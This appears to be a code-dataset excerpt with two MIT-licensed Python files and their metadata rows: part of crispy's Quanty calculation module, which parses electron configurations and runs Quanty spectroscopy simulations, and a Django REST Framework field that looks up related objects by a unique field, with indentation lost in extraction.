from crispy.quanty import CALCULATIONS, XDB
logger = logging.getLogger(__name__)
settings = Config().read()
SUBSHELLS = {
"3d": {"atomicNumbers": (21, 30 + 1), "coreElectrons": 18},
"4d": {"atomicNumbers": (39, 48 + 1), "coreElectrons": 36},
"4f": {"atomicNumbers": (57, 71 + 1), "coreElectrons": 54},
"5d": {"atomicNumbers": (72, 80 + 1), "coreElectrons": 68},
"5f": {"atomicNumbers": (89, 103 + 1), "coreElectrons": 86},
}
OCCUPANCIES = {"s": 2, "p": 6, "d": 10, "f": 14}
class Element(BaseItem):
def __init__(self, parent=None, name="Element", value=None):
super().__init__(parent=parent, name=name)
self.symbol = None
self.charge = None
self.value = value
@property
def atomicNumber(self):
return XDB.atomic_number(self.symbol)
@property
def valenceSubshell(self):
"""Name of the valence subshell."""
for subshell, properties in SUBSHELLS.items():
if self.atomicNumber in range(*properties["atomicNumbers"]):
return subshell
return None
@property
def valenceBlock(self):
# pylint: disable=unsubscriptable-object
"""Name of the valence block."""
return self.valenceSubshell[-1]
@property
def valenceOccupancy(self):
"""Occupancy of the valence subshell."""
assert self.charge is not None, "The charge must be set."
# Reverse the string holding the charge before changing it to
# an integer.
charge = int(self.charge[::-1])
# Calculate the number of electrons of the ion.
ion_electrons = self.atomicNumber - charge
core_electorns = SUBSHELLS[self.valenceSubshell]["coreElectrons"]
occupancy = ion_electrons - core_electorns
return occupancy
@property
def value(self):
if self.charge is None:
return f"{self.symbol}"
return f"{self.symbol}{self.charge}"
@value.setter
def value(self, value):
if value is None:
return
tokens = re.findall(r"(\w{1,2})(\d[+,-])", value)
if not tokens:
raise ValueError(f"Invalid element {value}.")
[tokens] = tokens
self.symbol, self.charge = tokens
class Configuration:
# pylint: disable=too-many-instance-attributes
def __init__(self, value=None):
self.value = value
self.energy = None
self.atomic_parameters = None
@property
def value(self):
return self._value
@value.setter
def value(self, value):
PATTERNS = (r"^(\d)(\w)(\d+),(\d)(\w)(\d+)$", r"^(\d)(\w)(\d+)$")
# Test the configuration string.
tokens = (token for pattern in PATTERNS for token in re.findall(pattern, value))
if not tokens:
raise ValueError("Invalid configuration string.")
[tokens] = tokens
if len(tokens) == 3:
core = None
valence = tokens
elif len(tokens) == 6:
core = tokens[:3]
valence = tokens[-3:]
else:
raise ValueError("Unexpected length of the configuration string.")
valenceLevel, valenceShell, valenceOccupancy = valence
valenceLevel = int(valenceLevel)
valenceOccupancy = int(valenceOccupancy)
if valenceOccupancy > OCCUPANCIES[valenceShell]:
raise ValueError("Wrong number of electrons in the valence shell.")
if core:
coreLevel, coreShell, coreOccupancy = core
coreLevel = int(coreLevel)
coreOccupancy = int(coreOccupancy)
if coreOccupancy > OCCUPANCIES[coreShell]:
raise ValueError("Wrong number of electrons in the core shell.")
self.levels = (coreLevel, valenceLevel)
self.shells = (coreShell, valenceShell)
self.occupancies = [coreOccupancy, valenceOccupancy]
else:
self.levels = (valenceLevel,)
self.shells = (valenceShell,)
self.occupancies = [valenceOccupancy]
self.subshells = tuple(
[f"{level}{shell}" for level, shell in zip(self.levels, self.shells)]
)
self._value = value
@property
def hasCore(self):
return len(self.subshells) == 2
@staticmethod
def countParticles(shell, occupancy):
"""Count the number of particles (electrons) or quasiparticles
(holes) in a shell."""
key = f"{shell}{occupancy}"
if key in ("s0", "s2", "p0", "p6", "d0", "d10", "f0", "f14"):
particles = "zero"
elif key in ("s1", "p1", "p5", "d1", "d9", "f1", "f13"):
particles = "one"
else:
particles = "multiple"
return particles
@property
def numberOfCoreParticles(self):
"""Count the number of core particles. Returns None if the electronic
configuration has no core."""
if not self.hasCore:
return None
core_shell, _ = self.shells
core_occupancy, _ = self.occupancies
return self.countParticles(core_shell, core_occupancy)
@classmethod
def fromSubshellsAndOccupancies(cls, subshells, occupancies):
value = ",".join(
f"{subshell:s}{occupancy:d}"
for subshell, occupancy in zip(subshells, occupancies)
)
return cls(value=value)
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return self.value == other.value
def __lt__(self, other):
return self.value < other.value
def __repr__(self):
return self.value
class Symmetry(BaseItem):
def __init__(self, parent=None, name="Symmetry", value=None):
super().__init__(parent=parent, name=name, value=value)
class Edge(BaseItem):
def __init__(self, parent=None, name="Edge", value=None):
super().__init__(parent=parent, name=name, value=value)
@property
def coreSubshells(self):
"""Use the name of the edge to determine the names of the core subshells.
e.g. for K (1s) the function returns ("1s",), while for K-L2,3 (1s2p) it
returns ("1s", "2p").
"""
PATTERNS = (r".*\((\d\w)(\d\w)\)", r".*\((\d\w)\)")
name = self.value
tokens = (token for pattern in PATTERNS for token in re.findall(pattern, name))
# Get the elements of the generator.
[tokens] = tokens
if not tokens:
raise ValueError("The name of the edge cannot be parsed.")
if isinstance(tokens, str):
tokens = (tokens,)
return tokens
@property
def coreBlocks(self):
return tuple(subshell[1] for subshell in self.coreSubshells)
@property
def coreOccupancies(self):
return tuple(OCCUPANCIES[coreBlock] for coreBlock in self.coreBlocks)
@property
def labels(self):
"""Edge or line labels needed to interrogate xraydb database."""
CONVERTERS = {
"Kɑ": "Ka1",
"Kβ": "Kb1",
"K": "K",
"L1": "L1",
"L2,3": "L3",
"M1": "M1",
"M2,3": "M3",
"M4,5": "M5",
"N1": "N1",
"N2,3": "N3",
"N4,5": "N5",
"O1": "O1",
"O2,3": "O3",
"O4,5": "O5",
}
raw, _ = self.value.split()
names = list()
separator = "-"
if separator in raw:
names.extend(raw.split(separator))
else:
names.append(raw)
# TODO: This needs to be put in a try/except block.
names = [CONVERTERS[name] for name in names]
return tuple(names)
class Experiment(BaseItem):
def __init__(self, parent=None, name="Experiment", value=None):
super().__init__(parent=parent, name=name, value=value)
@property
def isOneStep(self):
return self.value in ("XAS", "XPS")
@property
def isTwoSteps(self):
return not self.isOneStep
@property
def excitesToVacuum(self):
return self.value in ("XES", "XPS")
@property
def isOneDimensional(self):
return not self.isTwoDimensional
@property
def isTwoDimensional(self):
return self.value in ("RIXS",)
@property
def isEmission(self):
return self.value in ("XES",)
class Temperature(IntItem):
def __init__(self, parent=None, name="Temperature", value=None):
super().__init__(parent=parent, name=name, value=value)
@property
def value(self):
return self._value
@value.setter
def value(self, value):
if value < 0:
raise ValueError("The temperature cannot be negative.")
self._value = value
class MagneticField(DoubleItem):
def __init__(self, parent=None, name="Magnetic Field", value=None):
super().__init__(parent=parent, name=name, value=value)
@property
def value(self):
return self._value
@value.setter
def value(self, value):
self._value = value
# Set the values in the magnetic field Hamiltonian term.
calculation = self.ancestor
hamiltonian = calculation.hamiltonian
# Use the normalized vector.
k = calculation.axes.xaxis.photon.k.normalized
TESLA_TO_EV = 5.7883818011084e-05
for i, name in enumerate(("Bx", "By", "Bz")):
# Get the values of the wave vector.
for item in hamiltonian.findChild(name):
item.value = k[i] * value * TESLA_TO_EV
class Runner(QProcess):
outputUpdated = pyqtSignal(str)
successful = pyqtSignal(bool)
def __init__(self, parent=None):
super().__init__(parent=parent)
# Merge stdout and stderr channels.
self.setProcessChannelMode(QProcess.MergedChannels)
self.startingTime = None
self.endingTime = None
self.readyRead.connect(self.updateOutput)
self.finished.connect(self.checkExitCodes)
self.output = str()
def run(self, inputName):
self.startingTime = datetime.datetime.now()
# Run Quanty using QProcess.
try:
self.start(self.executablePath, (inputName,))
except FileNotFoundError as error:
raise RuntimeError from error
cwd = os.getcwd()
message = f"Running Quanty {inputName} in the folder {cwd}."
logger.info(message)
def checkExitCodes(self, exitCode, exitStatus):
self.endingTime = datetime.datetime.now()
successful = False
if exitStatus == 0 and exitCode == 0:
message = "Quanty has finished successfully in "
delta = self.runningTime
hours, reminder = divmod(delta, 3600)
minutes, seconds = divmod(reminder, 60)
seconds = round(seconds, 2)
if hours > 0:
message += "{} hours {} minutes and {} seconds.".format(
hours, minutes, seconds
)
elif minutes > 0:
message += "{} minutes and {} seconds.".format(minutes, seconds)
else:
message += "{} seconds.".format(seconds)
logger.info(message)
successful = True
elif exitStatus == 0 and exitCode == 1:
message = (
"Quanty has finished unsuccessfully. "
"Check the logging window for more details."
)
logger.info(message)
# exitCode is platform dependent; exitStatus is always 1.
elif exitStatus == 1:
message = "Quanty was stopped."
logger.info(message)
self.successful.emit(successful)
def updateOutput(self):
data = self.readAll().data()
data = data.decode("utf-8").rstrip()
self.output = self.output + data
self.outputUpdated.emit(data)
@property
def runningTime(self):
return (self.endingTime - self.startingTime).total_seconds()
@property
def executablePath(self):
path = Config().read().value("Quanty/Path")
if path is None:
message = (
"The path to the Quanty executable is not set. "
"Please use the preferences menu to set it."
)
raise FileNotFoundError(message)
# Test the executable.
with open(os.devnull, "w") as fp:
try:
subprocess.call(path, stdout=fp, stderr=fp)
except FileNotFoundError as e:
message = (
"The Quanty executable is not working properly. "
"Is the PATH set correctly?"
)
logger.error(message)
raise e
return path
class Calculation(SelectableItem):
# pylint: disable=too-many-instance-attributes, too-many-arguments, too-many-public-methods
titleChanged = pyqtSignal(str)
def __init__(
self,
symbol="Ni",
charge="2+",
symmetry="Oh",
experiment="XAS",
edge="L2,3 (2p)",
hamiltonian=True,
parent=None,
):
super().__init__(parent=parent, name="Calculation")
# Set the very special ancestor, in this case self.
self._ancestor = self
# Validate the keyword arguments. This is best done this way; using properties
# it gets rather convoluted.
self._symbols = list()
for subshell in CALCULATIONS.keys():
self._symbols.extend(CALCULATIONS[subshell]["symbols"])
self._symbols = tuple(sorted(self._symbols))
if symbol not in self.symbols:
symbol = self._symbols[0]
# Get the subshell.
subshell = None
for subshell in CALCULATIONS.keys():
if symbol in CALCULATIONS[subshell]["symbols"]:
break
symbols = CALCULATIONS[subshell]["symbols"]
experiments = CALCULATIONS[subshell]["experiments"]
self._charges = tuple(symbols[symbol]["charges"])
if charge not in self._charges:
charge = self._charges[0]
self._experiments = tuple(experiments)
if experiment not in self._experiments:
experiment = self._experiments[0]
self._symmetries = tuple(experiments[experiment]["symmetries"])
if symmetry not in self._symmetries:
symmetry = self._symmetries[0]
self._edges = tuple(experiments[experiment]["edges"])
if edge not in self._edges:
edge = self._edges[0]
self.element = Element(parent=self, value=f"{symbol}{charge}")
self.symmetry = Symmetry(parent=self, value=symmetry)
self.experiment = Experiment(parent=self, value=experiment)
self.edge = Edge(parent=self, value=edge)
self.temperature = Temperature(parent=self, value=10)
self.magneticField = MagneticField(parent=self, value=0)
self.axes = Axes(parent=self)
self.spectra = Spectra(parent=self)
# This flag is needed because the class is also used to generate Hamiltonian
# parameters, which are needed to create the Hamiltonian object in the
# first place. A bit of chicken and egg problem.
if hamiltonian:
self.hamiltonian = Hamiltonian(parent=self)
# Set the name of the calculation.
subshells = "".join(self.edge.coreSubshells)
element = self.element.value
symmetry = self.symmetry.value
experiment = self.experiment.value
self._value = f"{element}_{symmetry}_{experiment}_{subshells}"
# Instantiate the runner used to execute Quanty.
self.runner = Runner()
self.runner.successful.connect(self.process)
@property
def value(self):
return self._value
@value.setter
def value(self, value):
self._value = value
self.dataChanged.emit(0)
self.titleChanged.emit(value)
def data(self, column, role=Qt.DisplayRole):
if role in (Qt.EditRole, Qt.DisplayRole, Qt.UserRole):
column = 0 if column == 1 else 1
return super().data(column, role)
def setData(self, column, value, role=Qt.EditRole):
if role in (Qt.EditRole, Qt.UserRole):
column = 0 if column == 1 else 1
return super().setData(column, value, role)
def flags(self, column):
return (
Qt.ItemIsEnabled
| Qt.ItemIsSelectable
| Qt.ItemIsEditable
| Qt.ItemIsUserCheckable
)
@property
def symbols(self):
return self._symbols
@property
def charges(self):
return self._charges
@property
def symmetries(self):
return self._symmetries
@property
def experiments(self):
return self._experiments
@property
def edges(self):
return self._edges
@property
def templateName(self):
valenceSubshell = self.element.valenceSubshell
symmetry = self.symmetry.value
experiment = self.experiment.value
subshells = "".join(self.edge.coreSubshells)
return f"{valenceSubshell}_{symmetry}_{experiment}_{subshells}.lua"
@property
@lru_cache()
def configurations(self):
"""Determine the electronic configurations involved in a calculation."""
valenceSubshell = self.element.valenceSubshell
valenceOccupancy = self.element.valenceOccupancy
configurations = list()
# Initial configuration.
initialConfiguration = Configuration.fromSubshellsAndOccupancies(
subshells=(valenceSubshell,), occupancies=(valenceOccupancy,)
)
configurations.append(initialConfiguration)
# Final and in some cases intermediate configurations.
if self.experiment.isOneStep:
if not self.experiment.excitesToVacuum:
valenceOccupancy += 1
(coreSubshell,) = self.edge.coreSubshells
(coreOccupancy,) = self.edge.coreOccupancies
coreOccupancy -= 1
finalConfiguration = Configuration.fromSubshellsAndOccupancies(
subshells=(coreSubshell, valenceSubshell),
occupancies=(coreOccupancy, valenceOccupancy),
)
configurations.append(finalConfiguration)
else:
if not self.experiment.excitesToVacuum:
valenceOccupancy += 1
core1Subshell, core2Subshell = self.edge.coreSubshells
core1Occupancy, core2Occupancy = self.edge.coreOccupancies
core1Occupancy -= 1
core2Occupancy -= 1
intermediateConfiguration = Configuration.fromSubshellsAndOccupancies(
subshells=(core1Subshell, valenceSubshell),
occupancies=(core1Occupancy, valenceOccupancy),
)
configurations.append(intermediateConfiguration)
if core2Subshell == valenceSubshell:
finalConfiguration = Configuration.fromSubshellsAndOccupancies(
subshells=(valenceSubshell,),
occupancies=(valenceOccupancy - 1,),
)
else:
finalConfiguration = Configuration.fromSubshellsAndOccupancies(
subshells=(core2Subshell, valenceSubshell),
occupancies=(core2Occupancy, valenceOccupancy),
)
configurations.append(finalConfiguration)
return configurations
@property
def replacements(self):
"""Replacements dictionary used to fill the calculation template. The
construction of more complex items is delegated to the respective object.
"""
replacements = dict()
# Values defined in another places.
replacements["Verbosity"] = settings.value("Quanty/Verbosity")
replacements["DenseBorder"] = settings.value("Quanty/DenseBorder")
replacements["ShiftToZero"] = settings.value("Quanty/ShiftSpectra")
subshell = self.element.valenceSubshell
occupancy = self.element.valenceOccupancy
replacements[f"NElectrons_{subshell}"] = occupancy
replacements["Temperature"] = self.temperature.value
replacements["Prefix"] = self.value
replacements.update(self.axes.xaxis.replacements)
if self.experiment.isTwoDimensional:
replacements.update(self.axes.yaxis.replacements)
replacements.update(self.spectra.replacements)
replacements.update(self.hamiltonian.replacements)
return replacements
@property
def input(self):
path = resourceAbsolutePath(
os.path.join("quanty", "templates", f"{self.templateName}")
)
try:
with open(path) as fp:
template = fp.read()
except FileNotFoundError as e:
message = f"Could not find the template file {self.templateName}."
logger.error(message)
raise e
for pattern, replacement in self.replacements.items():
# True/False in Lua are lowercase.
if isinstance(replacement, bool):
replacement = str(replacement).lower()
else:
replacement = str(replacement)
template = template.replace(f"${pattern}", str(replacement))
return template
@property
def inputName(self):
return f"{self.value}.lua"
@property
def output(self):
return self.runner.output
# @property
# def summary(self):
# return f"Summary for {self.value}"
def saveInput(self):
# TODO: Is this too hidden?
os.chdir(settings.value("CurrentPath"))
with open(self.inputName, "w") as fp:
fp.write(self.input)
def run(self):
# Don't crash if something went wrong when saving the input file.
try:
self.saveInput()
except FileNotFoundError:
return
self.runner.run(self.inputName)
def process(self, successful):
if not successful:
return
# TODO: Check if loading the spectra was successful.
self.spectra.load()
def stop(self):
self.runner.kill()
def clean(self):
os.remove(f"{self.value}.lua")
# Remove the spectra.
for spectrum in glob.glob(f"{self.value}*.spec"):
os.remove(spectrum)
def copyFrom(self, item):
super().copyFrom(item)
self.temperature.copyFrom(item.temperature)
self.magneticField.copyFrom(item.magneticField)
self.axes.copyFrom(item.axes)
self.spectra.copyFrom(item.spectra)
self.hamiltonian.copyFrom(item.hamiltonian)
def main():
pass
if __name__ == "__main__":
main()
| 31.88785 | 95 | 0.59521 | [
"MIT"
] | jminar/crispy | crispy/gui/quanty/calculation.py | 23,886 | Python |
from django.core.exceptions import ObjectDoesNotExist
from rest_framework.serializers import PrimaryKeyRelatedField, RelatedField
class UniqueRelatedField(RelatedField):
"""
Like rest_framework's PrimaryKeyRelatedField, but selecting by any unique
field instead of the primary key.
"""
default_error_messages = PrimaryKeyRelatedField.default_error_messages.copy()
def __init__(self, field_name, serializer_field=None, **kwargs):
super().__init__(**kwargs)
self.related_field_name = field_name
self.serializer_field = serializer_field
def to_internal_value(self, data):
if self.serializer_field is not None:
data = self.serializer_field.to_internal_value(data)
try:
return self.get_queryset().get(**{self.related_field_name: data})
except ObjectDoesNotExist:
self.fail('does_not_exist', pk_value=data)
except (TypeError, ValueError):
self.fail('incorrect_type', data_type=type(data).__name__)
def to_representation(self, value):
value = getattr(value, self.related_field_name)
if self.serializer_field is not None:
value = self.serializer_field.to_representation(value)
return value
| 38.181818 | 81 | 0.711111 | [
"MIT"
] | azengard/reseller-api | apps/api/serializers.py | 1,260 | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.